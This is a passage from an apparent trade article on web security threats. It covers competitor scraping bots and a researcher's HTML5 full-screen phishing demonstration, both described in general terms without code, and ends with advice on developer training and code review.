Not all attacks are aimed at breaching a company's defenses. Automated Web bots scrape from Web pages information that can give a competitor better intelligence on your business. For example, if you have an online store, a competitor could collect data on your pricing from publicly available information on your site, says Marc Gaffan, co-founder of Web security firm Incapsula. "Are they breaching your site? No, but they are harming your business," he says. More than 30% of Web traffic to the average site is this sort of unwanted, potentially business-sapping traffic, Gaffan says.
Web application firewall services such as Incapsula and CloudFlare let businesses identify which traffic is connected to good search-indexing bots and which are bad market intelligence services or even fake Google bots. Such services block the requests, preventing information from going to competitors.
10. New Technology, Same Problems
Stanford graduate student and computer security researcher Feross Aboukhadijeh recently showed how an HTML5 feature could let an attacker pull off a convincing phishing attack. Using HTML5's ability to trigger full-screen mode, Aboukhadijeh created a large database of simulated pages that could fool users into thinking they had gone to a bank's website when, in fact, they were on an attacker's site.
Using Firefox on Mac OS X to click on a link that appears to go to Bank of America's consumer banking site? No problem. With Aboukhadijeh's attack that link is on an attacker-controlled page, and your click is intercepted. Since some browsers don't notify users that they're entering full-screen mode, attackers can throw up a full-screen disguise for any site and then use the fake site to obtain victims' login credentials.
In this case, rather than sending you to bankofamerica.com, the attacker throws up a full-screen page that makes it appear you're on the real Bank of America site. A careful inspection could tip off users to the fact that parts of the screen, such as the menu bar, don't match their normal desktop, but most people won't look that closely.
"Links are the bread and butter of the Web," Aboukhadijeh wrote on his site. "People click links all day long -- people are pretty trained to think that clicking a link on the Web is safe. Savvy users may check the link's destination in the status bar before clicking. However, in this case, it won't do them any good." That's because the attacker can make the fake site appear to go to the real site, say, bofa.com.
The automated security tools that could eliminate HTML5 security issues aren't available yet, says NT Objectives' Kuykendall. "People are outpacing their security tools, which is going to leave them exposed," he says.
Training developers in secure practices, especially with new platforms such as HTML5, is a critical first step to preventing security problems. In addition, having developers check one another's code can cut down on vulnerabilities.
As with any collection of threats, businesses will find themselves with different exposures. An online business may have SQL injection and HTML5 issues, while a firm with a lot of telecommuters may have mobile issues, including exposed devices with embedded vulnerabilities. Rather than attempt to minimize the dangers from every threat, companies should focus on the subset of vulnerabilities where they're most exposed.